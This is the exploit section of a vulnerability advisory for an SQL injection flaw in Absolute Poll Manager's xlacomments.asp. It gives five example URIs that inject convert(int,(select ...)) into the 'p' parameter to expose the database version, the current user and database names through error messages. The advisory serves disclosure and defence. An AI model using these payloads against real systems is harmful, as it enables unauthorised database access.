• info
• discussion
• exploit
• solution
• references

Absolute Poll Manager 'xlacomments.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))
http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))
http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))
http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))